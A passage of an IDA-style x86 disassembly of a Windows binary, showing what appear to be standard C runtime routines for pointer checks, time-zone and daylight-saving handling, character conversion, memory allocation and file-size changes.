push offset sub_42086E
call ds:off_42401C
mov ds:dword_48A218, eax
retn
sub_4208B4 endp
; =============== S U B R O U T I N E =======================================
sub_4208C5 proc near ; DATA XREF: _2:0042603C�o
push ds:dword_48A218
call ds:off_42401C
retn
sub_4208C5 endp
; =============== S U B R O U T I N E =======================================
sub_4208D2 proc near ; CODE XREF: sub_41CD45+6B�p
; sub_41D256+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_424018 ; IsBadReadPtr
test eax, eax
jz short loc_4208EA
xor esi, esi
loc_4208EA: ; CODE XREF: sub_4208D2+14�j
mov eax, esi
pop esi
retn
sub_4208D2 endp
; =============== S U B R O U T I N E =======================================
sub_4208EE proc near ; CODE XREF: sub_41D256+73�p
; sub_41D256+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_4241B8 ; IsBadWritePtr
test eax, eax
jz short loc_420906
xor esi, esi
loc_420906: ; CODE XREF: sub_4208EE+14�j
mov eax, esi
pop esi
retn
sub_4208EE endp
; =============== S U B R O U T I N E =======================================
sub_42090A proc near ; CODE XREF: sub_41D256+15B�p
; sub_42086E+2D�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call ds:dword_424014 ; IsBadCodePtr
test eax, eax
jz short loc_42091E
xor esi, esi
loc_42091E: ; CODE XREF: sub_42090A+10�j
mov eax, esi
pop esi
retn
sub_42090A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D4FC
loc_420922: ; CODE XREF: sub_41D4FC:loc_41D54D�j
push 0Ah
call sub_41F885
push 16h
call sub_421C3C
pop ecx
pop ecx
push 3
call sub_419AF6
; END OF FUNCTION CHUNK FOR sub_41D4FC
; =============== S U B R O U T I N E =======================================
sub_420939 proc near ; CODE XREF: sub_41D609:loc_41D648�p
cmp ds:dword_48A2D8, 0
jnz short locret_42094D
call sub_42094E
inc ds:dword_48A2D8
locret_42094D: ; CODE XREF: sub_420939+7�j
retn
sub_420939 endp
; =============== S U B R O U T I N E =======================================
sub_42094E proc near ; CODE XREF: sub_420939+9�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset aTz ; "TZ"
xor edi, edi
mov ds:dword_48A220, ebp
mov ds:dword_43C018, ebx
mov ds:dword_43C008, ebx
call sub_421DAE
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_420A77
push offset dword_48A228
call ds:dword_42418C ; GetTimeZoneInformation
cmp eax, ebx
jz loc_420BA6
mov eax, ds:dword_48A228
mov ecx, ds:dword_48A27C
imul eax, 3Ch
cmp ds:word_48A26E, bp
push 1
pop edx
mov ds:dword_43BF70, eax
mov ds:dword_48A220, edx
jz short loc_4209C5
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov ds:dword_43BF70, eax
loc_4209C5: ; CODE XREF: sub_42094E+69�j
cmp ds:word_48A2C2, bp
jz short loc_4209E9
mov eax, ds:dword_48A2D0
cmp eax, ebp
jz short loc_4209E9
sub eax, ecx
mov ds:dword_43BF74, edx
imul eax, 3Ch
mov ds:dword_43BF78, eax
jmp short loc_4209F5
; ---------------------------------------------------------------------------
loc_4209E9: ; CODE XREF: sub_42094E+7E�j
; sub_42094E+87�j
mov ds:dword_43BF74, ebp
mov ds:dword_43BF78, ebp
loc_4209F5: ; CODE XREF: sub_42094E+99�j
lea eax, [esp+14h+var_4]
mov esi, ds:dword_424150
push eax
push ebp
push 3Fh
mov edi, 220h
push ds:off_43BFFC
push ebx
push offset dword_48A22C
push edi
push ds:dword_48A0B8
call esi ; WideCharToMultiByte
test eax, eax
jz short loc_420A32
cmp [esp+14h+var_4], ebp
jnz short loc_420A32
mov eax, ds:off_43BFFC
and byte ptr [eax+3Fh], 0
jmp short loc_420A3A
; ---------------------------------------------------------------------------
loc_420A32: ; CODE XREF: sub_42094E+D1�j
; sub_42094E+D7�j
mov eax, ds:off_43BFFC
and byte ptr [eax], 0
loc_420A3A: ; CODE XREF: sub_42094E+E2�j
lea eax, [esp+14h+var_4]
push eax
push ebp
push 3Fh
push ds:off_43C000
push ebx
push offset dword_48A280
push edi
push ds:dword_48A0B8
call esi ; WideCharToMultiByte
test eax, eax
jz loc_420B9E
cmp [esp+14h+var_4], ebp
jnz loc_420B9E
mov eax, ds:off_43C000
and byte ptr [eax+3Fh], 0
jmp loc_420BA6
; ---------------------------------------------------------------------------
loc_420A77: ; CODE XREF: sub_42094E+2D�j
cmp byte ptr [esi], 0
jz loc_420BA6
mov eax, ds:dword_48A2D4
cmp eax, ebp
jz short loc_420A9A
push eax
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_420BA6
loc_420A9A: ; CODE XREF: sub_42094E+139�j
push ds:dword_48A2D4
call sub_417C3B
push esi
call sub_417AB0
inc eax
push eax
call sub_417B89
add esp, 0Ch
cmp eax, ebp
mov ds:dword_48A2D4, eax
jz loc_420BA6
push esi
push eax
call sub_4179C0
push 3
push esi
push ds:off_43BFFC
call sub_418C10
mov eax, ds:off_43BFFC
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_420AEF
push 1
inc esi
pop edi
loc_420AEF: ; CODE XREF: sub_42094E+19B�j
push esi
call sub_417794
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov ds:dword_43BF70, ecx
loc_420B06: ; CODE XREF: sub_42094E+1C7�j
mov al, [esi]
cmp al, 2Bh
jz short loc_420B14
cmp al, bl
jl short loc_420B17
cmp al, 39h
jg short loc_420B17
loc_420B14: ; CODE XREF: sub_42094E+1BC�j
inc esi
jmp short loc_420B06
; ---------------------------------------------------------------------------
loc_420B17: ; CODE XREF: sub_42094E+1C0�j
; sub_42094E+1C4�j
cmp byte ptr [esi], 3Ah
jnz short loc_420B6A
inc esi
push esi
call sub_417794
imul eax, 3Ch
pop ecx
mov ecx, ds:dword_43BF70
add ecx, eax
mov ds:dword_43BF70, ecx
loc_420B35: ; CODE XREF: sub_42094E+1F2�j
mov al, [esi]
cmp al, bl
jl short loc_420B42
cmp al, 39h
jg short loc_420B42
inc esi
jmp short loc_420B35
; ---------------------------------------------------------------------------
loc_420B42: ; CODE XREF: sub_42094E+1EB�j
; sub_42094E+1EF�j
cmp byte ptr [esi], 3Ah
jnz short loc_420B6A
inc esi
push esi
call sub_417794
pop ecx
mov ecx, ds:dword_43BF70
add ecx, eax
mov ds:dword_43BF70, ecx
loc_420B5D: ; CODE XREF: sub_42094E+21A�j
mov al, [esi]
cmp al, bl
jl short loc_420B6A
cmp al, 39h
jg short loc_420B6A
inc esi
jmp short loc_420B5D
; ---------------------------------------------------------------------------
loc_420B6A: ; CODE XREF: sub_42094E+1CC�j
; sub_42094E+1F7�j ...
cmp edi, ebp
jz short loc_420B76
neg ecx
mov ds:dword_43BF70, ecx
loc_420B76: ; CODE XREF: sub_42094E+21E�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov ds:dword_43BF74, eax
jz short loc_420B9E
push 3
push esi
push ds:off_43C000
call sub_418C10
mov eax, ds:off_43C000
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_420BA6
; ---------------------------------------------------------------------------
loc_420B9E: ; CODE XREF: sub_42094E+10B�j
; sub_42094E+115�j ...
mov eax, ds:off_43C000
and byte ptr [eax], 0
loc_420BA6: ; CODE XREF: sub_42094E+40�j
; sub_42094E+124�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_42094E endp
; =============== S U B R O U T I N E =======================================
sub_420BAC proc near ; CODE XREF: sub_41D609+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp ds:dword_43BF74, edi
jnz short loc_420BC0
loc_420BB9: ; CODE XREF: sub_420BAC+148�j
; sub_420BAC+150�j ...
xor eax, eax
jmp loc_420D0C
; ---------------------------------------------------------------------------
loc_420BC0: ; CODE XREF: sub_420BAC+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, ds:dword_43C008
jnz short loc_420BDE
cmp eax, ds:dword_43C018
jz loc_420CE0
loc_420BDE: ; CODE XREF: sub_420BAC+24�j
cmp ds:dword_48A220, edi
jz loc_420CB6
movzx ecx, ds:word_48A2CE
push ecx
cmp ds:word_48A2C0, di
movzx ecx, ds:word_48A2CC
push ecx
movzx ecx, ds:word_48A2CA
push ecx
movzx ecx, ds:word_48A2C8
push ecx
jnz short loc_420C30
movzx ecx, ds:word_48A2C4
push edi
push ecx
movzx ecx, ds:word_48A2C6
push ecx
movzx ecx, ds:word_48A2C2
push ecx
push eax
push ebx
jmp short loc_420C44
; ---------------------------------------------------------------------------
loc_420C30: ; CODE XREF: sub_420BAC+65�j
movzx ecx, ds:word_48A2C6
push ecx
push edi
movzx ecx, ds:word_48A2C2
push edi
push ecx
push eax
push edi
loc_420C44: ; CODE XREF: sub_420BAC+82�j
push ebx
call sub_420D58
movzx eax, ds:word_48A27A
add esp, 2Ch
cmp ds:word_48A26C, di
push eax
movzx eax, ds:word_48A278
push eax
movzx eax, ds:word_48A276
push eax
movzx eax, ds:word_48A274
push eax
jnz short loc_420C9E
movzx eax, ds:word_48A270
push edi
push eax
movzx eax, ds:word_48A272
push eax
movzx eax, ds:word_48A26E
push eax
push dword ptr [esi+14h]
push ebx
loc_420C93: ; CODE XREF: sub_420BAC+108�j
push edi
call sub_420D58
add esp, 2Ch
jmp short loc_420CE0
; ---------------------------------------------------------------------------
loc_420C9E: ; CODE XREF: sub_420BAC+C8�j
movzx eax, ds:word_48A272
push eax
push edi
movzx eax, ds:word_48A26E
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_420C93
; ---------------------------------------------------------------------------
loc_420CB6: ; CODE XREF: sub_420BAC+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_420D58
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_420D58
add esp, 58h
loc_420CE0: ; CODE XREF: sub_420BAC+2C�j
; sub_420BAC+F0�j
mov edx, ds:dword_43C00C
mov eax, ds:dword_43C01C
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_420D10
cmp ecx, edx
jl loc_420BB9
cmp ecx, eax
jg loc_420BB9
cmp ecx, edx
jle short loc_420D24
cmp ecx, eax
jge short loc_420D24
loc_420D0A: ; CODE XREF: sub_420BAC+166�j
; sub_420BAC+16A�j
mov eax, ebx
loc_420D0C: ; CODE XREF: sub_420BAC+F�j
; sub_420BAC+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_420D10: ; CODE XREF: sub_420BAC+144�j
cmp ecx, eax
jl short loc_420D0A
cmp ecx, edx
jg short loc_420D0A
cmp ecx, eax
jle short loc_420D24
cmp ecx, edx
jl loc_420BB9
loc_420D24: ; CODE XREF: sub_420BAC+158�j
; sub_420BAC+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_420D4B
xor ecx, ecx
cmp eax, ds:dword_43C010
setnl cl
loc_420D47: ; CODE XREF: sub_420BAC+1AA�j
mov eax, ecx
jmp short loc_420D0C
; ---------------------------------------------------------------------------
loc_420D4B: ; CODE XREF: sub_420BAC+18E�j
xor ecx, ecx
cmp eax, ds:dword_43C020
setl cl
jmp short loc_420D47
sub_420BAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D58 proc near ; CODE XREF: sub_420BAC+99�p
; sub_420BAC+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_420DF3
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_420D83
shl esi, 2
mov eax, ds:dword_43C020[esi]
jmp short loc_420D8C
; ---------------------------------------------------------------------------
loc_420D83: ; CODE XREF: sub_420D58+1E�j
shl esi, 2
mov eax, ds:dword_43C054[esi]
loc_420D8C: ; CODE XREF: sub_420D58+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jg short loc_420DC6
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_420DD0
; ---------------------------------------------------------------------------
loc_420DC6: ; CODE XREF: sub_420D58+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_420DD0: ; CODE XREF: sub_420D58+6C�j
cmp [ebp+arg_10], 5
jnz short loc_420E0E
cmp [ebp+arg_8], 0
jnz short loc_420DE4
mov esi, ds:dword_43C024[esi]
jmp short loc_420DEA
; ---------------------------------------------------------------------------
loc_420DE4: ; CODE XREF: sub_420D58+82�j
mov esi, ds:dword_43C058[esi]
loc_420DEA: ; CODE XREF: sub_420D58+8A�j
cmp ecx, esi
jle short loc_420E0E
sub ecx, 7
jmp short loc_420E0E
; ---------------------------------------------------------------------------
loc_420DF3: ; CODE XREF: sub_420D58+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_420E04
mov ecx, ds:dword_43C020[eax*4]
jmp short loc_420E0B
; ---------------------------------------------------------------------------
loc_420E04: ; CODE XREF: sub_420D58+A1�j
mov ecx, ds:dword_43C054[eax*4]
loc_420E0B: ; CODE XREF: sub_420D58+AA�j
add ecx, [ebp+arg_18]
loc_420E0E: ; CODE XREF: sub_420D58+7C�j
; sub_420D58+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_420E3F
mov eax, [ebp+arg_1C]
mov ds:dword_43C00C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov ds:dword_43C008, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov ds:dword_43C010, eax
jmp short loc_420E94
; ---------------------------------------------------------------------------
loc_420E3F: ; CODE XREF: sub_420D58+BA�j
mov eax, [ebp+arg_1C]
mov ds:dword_43C01C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, ds:dword_43BF78
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov ds:dword_43C020, eax
jns short loc_420E77
add eax, 5265C00h
dec ecx
mov ds:dword_43C020, eax
jmp short loc_420E88
; ---------------------------------------------------------------------------
loc_420E77: ; CODE XREF: sub_420D58+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_420E8E
sub eax, edx
inc ecx
mov ds:dword_43C020, eax
loc_420E88: ; CODE XREF: sub_420D58+11D�j
mov ds:dword_43C01C, ecx
loc_420E8E: ; CODE XREF: sub_420D58+126�j
mov ds:dword_43C018, ebx
loc_420E94: ; CODE XREF: sub_420D58+E5�j
pop esi
pop ebx
pop ebp
retn
sub_420D58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420E98 proc near ; CODE XREF: sub_41D797+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_420EBB
cmp [ebp+arg_8], ebx
jz short loc_420EBB
mov al, [esi]
cmp al, bl
jnz short loc_420EC1
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_420EBB
mov [eax], bx
loc_420EBB: ; CODE XREF: sub_420E98+C�j
; sub_420E98+11�j ...
xor eax, eax
loc_420EBD: ; CODE XREF: sub_420E98+42�j
; sub_420E98+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420EC1: ; CODE XREF: sub_420E98+17�j
cmp ds:dword_48A0A8, ebx
jnz short loc_420EDC
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_420ED7
movzx ax, al
mov [ecx], ax
loc_420ED7: ; CODE XREF: sub_420E98+36�j
; sub_420E98+C0�j
push 1
pop eax
jmp short loc_420EBD
; ---------------------------------------------------------------------------
loc_420EDC: ; CODE XREF: sub_420E98+2F�j
mov ecx, ds:off_4395A0
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_420F39
mov eax, ds:dword_4397AC
cmp eax, 1
jle short loc_420F20
cmp [ebp+arg_8], eax
jl short loc_420F2A
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push ds:dword_48A0B8
call ds:dword_424070 ; MultiByteToWideChar
test eax, eax
mov eax, ds:dword_4397AC
jnz short loc_420EBD
loc_420F20: ; CODE XREF: sub_420E98+5C�j
cmp [ebp+arg_8], eax
jb short loc_420F2A
cmp [esi+1], bl
jnz short loc_420EBD
loc_420F2A: ; CODE XREF: sub_420E98+61�j
; sub_420E98+8B�j ...
mov ds:dword_48A014, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_420EBD
; ---------------------------------------------------------------------------
loc_420F39: ; CODE XREF: sub_420E98+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push ds:dword_48A0B8
call ds:dword_424070 ; MultiByteToWideChar
test eax, eax
jnz loc_420ED7
jmp short loc_420F2A
sub_420E98 endp
; =============== S U B R O U T I N E =======================================
sub_420F60 proc near ; CODE XREF: sub_41D797+76�p
; sub_41D797+88�p ...
arg_0 = dword ptr 4
cmp ds:dword_4397AC, 1
jle short loc_420F77
push 8
push [esp+4+arg_0]
call sub_41A642
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_420F77: ; CODE XREF: sub_420F60+7�j
mov eax, [esp+arg_0]
mov ecx, ds:off_4395A0
mov al, [ecx+eax*2]
and eax, 8
retn
sub_420F60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_420F90 proc near ; CODE XREF: sub_41D797+797�p
; sub_41D797+7E7�p
cmp cl, 40h
jnb short loc_420FAA
cmp cl, 20h
jnb short loc_420FA0
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_420FA0: ; CODE XREF: sub_420F90+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_420FAA: ; CODE XREF: sub_420F90+3�j
xor eax, eax
xor edx, edx
retn
sub_420F90 endp
; =============== S U B R O U T I N E =======================================
sub_420FAF proc near ; CODE XREF: sub_41E20D+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_420FFB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_420FCD
test al, 80h
jz short loc_420FFB
test al, 2
jnz short loc_420FFB
loc_420FCD: ; CODE XREF: sub_420FAF+14�j
cmp dword ptr [esi+8], 0
jnz short loc_420FDA
push esi
call sub_41F9D8
pop ecx
loc_420FDA: ; CODE XREF: sub_420FAF+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_420FEA
cmp dword ptr [esi+4], 0
jnz short loc_420FFB
inc eax
mov [esi], eax
loc_420FEA: ; CODE XREF: sub_420FAF+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_421001
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_421007
inc eax
mov [esi], eax
loc_420FFB: ; CODE XREF: sub_420FAF+9�j
; sub_420FAF+18�j ...
or eax, 0FFFFFFFFh
loc_420FFE: ; CODE XREF: sub_420FAF+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_421001: ; CODE XREF: sub_420FAF+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_421007: ; CODE XREF: sub_420FAF+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_420FFE
sub_420FAF endp
; =============== S U B R O U T I N E =======================================
sub_42101D proc near ; CODE XREF: sub_41F12F+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_42102E
add esp, 0Ch
retn
sub_42101D endp
; =============== S U B R O U T I N E =======================================
sub_42102E proc near ; CODE XREF: sub_42101D+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test ds:byte_48B561[eax], cl
jnz short loc_42105B
cmp [esp+arg_4], 0
jz short loc_421054
movzx eax, ds:word_4395AA[eax*2]
and eax, [esp+arg_4]
jmp short loc_421056
; ---------------------------------------------------------------------------
loc_421054: ; CODE XREF: sub_42102E+16�j
xor eax, eax
loc_421056: ; CODE XREF: sub_42102E+24�j
test eax, eax
jnz short loc_42105B
retn
; ---------------------------------------------------------------------------
loc_42105B: ; CODE XREF: sub_42102E+F�j
; sub_42102E+2A�j
push 1
pop eax
retn
sub_42102E endp
; =============== S U B R O U T I N E =======================================
sub_42105F proc near ; CODE XREF: sub_41F885+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_48A2DC, ebx
push esi
push edi
jnz short loc_4210AE
push offset aUser32_dll ; "user32.dll"
call ds:off_4240E0
mov edi, eax
cmp edi, ebx
jz short loc_4210E4
mov esi, ds:off_4240DC
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; sub_49C076
test eax, eax
mov ds:dword_48A2DC, eax
jz short loc_4210E4
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; sub_49C076
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_48A2E0, eax
call esi ; sub_49C076
mov ds:dword_48A2E4, eax
loc_4210AE: ; CODE XREF: sub_42105F+B�j
mov eax, ds:dword_48A2E0
test eax, eax
jz short loc_4210CD
call eax
mov ebx, eax
test ebx, ebx
jz short loc_4210CD
mov eax, ds:dword_48A2E4
test eax, eax
jz short loc_4210CD
push ebx
call eax
mov ebx, eax
loc_4210CD: ; CODE XREF: sub_42105F+56�j
; sub_42105F+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call ds:dword_48A2DC
loc_4210E0: ; CODE XREF: sub_42105F+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4210E4: ; CODE XREF: sub_42105F+1C�j
; sub_42105F+33�j
xor eax, eax
jmp short loc_4210E0
sub_42105F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4210E8 proc near ; CODE XREF: sub_41FA42+22�p
; sub_41FA42+3B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
cmp esi, 0FFFFFFE0h
push edi
mov [ebp+arg_0], esi
ja short loc_421109
test esi, esi
jnz short loc_421103
push 1
pop esi
loc_421103: ; CODE XREF: sub_4210E8+16�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_421109: ; CODE XREF: sub_4210E8+12�j
; sub_4210E8+94�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_421168
mov eax, ds:dword_48B688
cmp eax, 3
jnz short loc_421134
mov eax, [ebp+arg_0]
cmp eax, ds:dword_48B680
ja short loc_421153
push eax
call sub_41B0DD
mov edi, eax
pop ecx
test edi, edi
jnz short loc_42117E
jmp short loc_421153
; ---------------------------------------------------------------------------
loc_421134: ; CODE XREF: sub_4210E8+30�j
cmp eax, 2
jnz short loc_421153
cmp esi, ds:dword_43B7E4
ja short loc_421153
mov eax, esi
shr eax, 4
push eax
call sub_41BB80
mov edi, eax
pop ecx
test edi, edi
jnz short loc_421192
loc_421153: ; CODE XREF: sub_4210E8+3B�j
; sub_4210E8+4A�j ...
push esi
push 8
push ds:dword_48B684
call ds:dword_4240E8 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_42118C
loc_421168: ; CODE XREF: sub_4210E8+26�j
cmp ds:dword_48A074, 0
jz short loc_42118C
push esi
call sub_41AB54
test eax, eax
pop ecx
jz short loc_421195
jmp short loc_421109
; ---------------------------------------------------------------------------
loc_42117E: ; CODE XREF: sub_4210E8+48�j
push [ebp+arg_0]
loc_421181: ; CODE XREF: sub_4210E8+AB�j
push 0
push edi
call sub_417330
add esp, 0Ch
loc_42118C: ; CODE XREF: sub_4210E8+7E�j
; sub_4210E8+87�j
mov eax, edi
loc_42118E: ; CODE XREF: sub_4210E8+AF�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_421192: ; CODE XREF: sub_4210E8+69�j
push esi
jmp short loc_421181
; ---------------------------------------------------------------------------
loc_421195: ; CODE XREF: sub_4210E8+92�j
xor eax, eax
jmp short loc_42118E
sub_4210E8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41FAE7
loc_421199: ; CODE XREF: sub_41FAE7+E�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp ds:dword_48B320, esi
jle short loc_4211EC
loc_4211A8: ; CODE XREF: sub_41FAE7+1703�j
mov eax, ds:dword_48A310
mov eax, [eax+esi*4]
test eax, eax
jz short loc_4211E3
test byte ptr [eax+0Ch], 83h
jz short loc_4211C7
push eax
call sub_417900
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4211C7
inc edi
loc_4211C7: ; CODE XREF: sub_41FAE7+16D1�j
; sub_41FAE7+16DD�j
cmp esi, 14h
jl short loc_4211E3
mov eax, ds:dword_48A310
push dword ptr [eax+esi*4]
call sub_417C3B
mov eax, ds:dword_48A310
pop ecx
and dword ptr [eax+esi*4], 0
loc_4211E3: ; CODE XREF: sub_41FAE7+16CB�j
; sub_41FAE7+16E3�j
inc esi
cmp esi, ds:dword_48B320
jl short loc_4211A8
loc_4211EC: ; CODE XREF: sub_41FAE7+16BF�j
mov eax, edi
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_41FAE7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4211F1 proc near ; CODE XREF: sub_41FEC6+271�p
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_417B30
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, ds:dword_48B440
jnb loc_421326
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_48B340[eax*4]
test byte ptr [eax+ecx*8+4], 1
jz loc_421326
push 1
push esi
push ebx
call sub_41E517
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_421330
push 2
push esi
push ebx
call sub_41E517
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_421330
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_4212D3
push 1000h
lea eax, [ebp+var_1000]
push esi
push eax
call sub_417330
push 8000h
push ebx
call sub_421E2B
add esp, 14h
mov [ebp+arg_4], eax
loc_421287: ; CODE XREF: sub_4211F1+BD�j
mov eax, 1000h
cmp edi, eax
jge short loc_421292
mov eax, edi
loc_421292: ; CODE XREF: sub_4211F1+9D�j
push eax
lea eax, [ebp+var_1000]
push eax
push ebx
call sub_41ED97
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_4212B0
sub edi, eax
test edi, edi
jle short loc_4212C6
jmp short loc_421287
; ---------------------------------------------------------------------------
loc_4212B0: ; CODE XREF: sub_4211F1+B5�j
cmp ds:dword_48A018, 5
jnz short loc_4212C3
mov ds:dword_48A014, 0Dh
loc_4212C3: ; CODE XREF: sub_4211F1+C6�j
or esi, 0FFFFFFFFh
loc_4212C6: ; CODE XREF: sub_4211F1+BB�j
push [ebp+arg_4]
push ebx
call sub_421E2B
pop ecx
pop ecx
jmp short loc_421313
; ---------------------------------------------------------------------------
loc_4212D3: ; CODE XREF: sub_4211F1+71�j
jge short loc_421313
push 0
push [ebp+arg_4]
push ebx
call sub_41E517
push ebx
call sub_41FE32
add esp, 10h
push eax
call ds:dword_424010 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_421313
mov ds:dword_48A014, 0Dh
call ds:dword_42408C ; RtlGetLastWin32Error
mov ds:dword_48A018, eax
loc_421313: ; CODE XREF: sub_4211F1+E0�j
; sub_4211F1:loc_4212D3�j ...
push 0
push [ebp+arg_0]
push ebx
call sub_41E517
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_421333
; ---------------------------------------------------------------------------
